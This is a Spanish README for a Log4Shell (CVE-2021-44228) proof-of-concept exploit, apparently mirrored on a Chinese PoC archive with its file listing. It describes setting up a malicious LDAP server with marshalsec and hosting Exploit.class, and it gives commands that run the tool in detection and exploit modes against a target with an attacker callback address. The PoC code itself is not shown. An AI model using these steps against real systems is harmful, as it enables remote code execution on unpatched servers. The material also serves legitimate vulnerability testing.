关联漏洞
描述
Log4Shell CVE-2021-44228 PoC
介绍
# Log4Shell
(CVE-2021-44228)
# ☠️ Log4Shell PoC (CVE-2021-44228)
Exploit de prueba para la vulnerabilidad crítica **Log4Shell** en Apache Log4j ≤ 2.14.1, que permite ejecución remota de código mediante inyecciones JNDI.
> ⚠️ **Este PoC es solo para fines educativos y pruebas controladas en entornos autorizados.** No lo utilices contra sistemas sin permiso expreso.
---
## Requisitos
- Python 3.x
- Java 8 o superior
- [`marshalsec`](https://github.com/mbechler/marshalsec) (para el servidor LDAP malicioso)
- Servidor HTTP (por ejemplo, `python3 -m http.server`)
- Docker (opcional para entorno vulnerable)
---
## Entorno de prueba local (opcional con Docker)
1. Ejecuta la app vulnerable:
```bash
docker run -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app
```
2. Accede a: http://localhost:8080
```bash
git clone https://github.com/mbechler/marshalsec.git
cd marshalsec
mvn clean package -DskipTests
```
---
## Uso
### Modo detección pasiva:
```bash
python3 main.py -u http://target.com -i burp.collab.net -m detect
```
### Modo intrusivo (requiere Exploit.class en tu HTTP):
```bash
python3 main.py -u http://target.com -i 192.168.0.100:1389 -m exploit
```
---
文件快照
[4.0K] /data/pocs/0acbedaaeaeef281c52f0713e86a6fe1dd823c22
├── [ 288] Exploit.java
├── [3.2K] main.py
├── [1.2K] README.md
└── [ 17] requirements.txt
0 directories, 4 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。